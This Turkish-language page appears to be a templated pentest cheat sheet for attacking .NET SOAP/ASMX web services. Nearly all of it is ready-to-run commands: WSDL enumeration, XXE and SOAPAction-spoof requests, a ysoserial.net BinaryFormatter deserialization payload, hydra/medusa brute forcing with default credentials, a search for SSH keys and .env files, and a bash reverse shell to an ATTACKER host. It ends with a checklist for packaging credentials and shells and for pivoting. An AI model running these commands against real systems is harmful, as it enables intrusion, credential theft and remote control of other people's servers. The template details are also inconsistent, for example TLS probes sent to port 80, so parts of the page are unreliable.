Skip to content

Dotnet Soap Wsdl Client Exploitation

.NET SOAP web

WSDL metod ve tip sızdırır. XXE, SOAPAction spoof ve .NET deser klasik saldırılardır. Hedef lab IP’si üzerinde komutları 80 portuna göre uyarla; her başarıyı ayrı kanıtla.

  1. WSDL/ASMX keşfet.

  2. Metod parametreleri.

  3. XXE/SQLi.

  4. BinaryFormatter deser.

Terminal window
curl -s https://TARGET/service.asmx?WSDL
Terminal window
soapui / wsdumper https://TARGET/service.asmx?WSDL
Terminal window
ffuf -u https://TARGET/FUZZ.asmx -w nets.txt -mc 200
Terminal window
curl -sk -X POST https://TARGET/service.asmx -H 'Content-Type: text/xml' -d @xxe.xml
Terminal window
curl -sk -X POST https://TARGET/service.asmx -H 'SOAPAction: Unexpected' -d @body.xml
Terminal window
ysoserial.net -f BinaryFormatter -g TypeConfuseDelegate -c id

Dotnet Soap Wsdl Client Exploitation için ek keşif ve fingerprint.

Terminal window
nmap -Pn -sV -sC -p80 TARGET
Terminal window
nmap -Pn -p80 --script safe,discovery TARGET
Terminal window
timeout 5 bash -c 'echo | openssl s_client -connect TARGET:80' 2>/dev/null | head
Terminal window
python3 -c "import socket;s=socket.create_connection(('TARGET',80));s.settimeout(3);print(s.recv(4096))"
Banner / TLS / ALPN notları → Dotnet Soap Wsdl Client Exploitation
Terminal window
hydra -L users.txt -P rockyou.txt -s 80 PROTOCOL://TARGET -t 4
Terminal window
medusa -h TARGET -U users.txt -P rockyou.txt -M PROTOCOL -n 80
Terminal window
nmap -p80 --script '*-brute' TARGET
admin/admin, root/root, guest/(boş), test/test
Terminal window
searchsploit .NET SOAP
Terminal window
msfconsole -q -x 'search .NET SOAP; exit'
Terminal window
nuclei -u https://TARGET:80 -t cves/ -silent -severity || true
Terminal window
nuclei -u http://TARGET:80 -tags tech -silent || true
Terminal window
nc -nv TARGET 80
Terminal window
printf '
' | timeout 3 nc -nv TARGET 80
Terminal window
curl -vk --http1.0 http://TARGET:80/
Wireshark/tcpdump ile konuşmayı kaydet; replay dene
config, key, session, env, backup
Terminal window
find / -name '*.conf' -o -name '*.env' -o -name 'id_rsa' 2>/dev/null | head
Terminal window
ss -lntp; ip a; cat /etc/passwd | head
Terminal window
bash -i >& /dev/tcp/ATTACKER/443 0>&1
Terminal window
mkdir -p loot && tee loot/notes.txt
[ ] Fingerprint / sürüm
[ ] Auth ve anonim erişim
[ ] PoC etki gösterildi
[ ] Credential/shell paketlendi
[ ] Pivot notu
WSDL → method abuse / XXE / deser → impact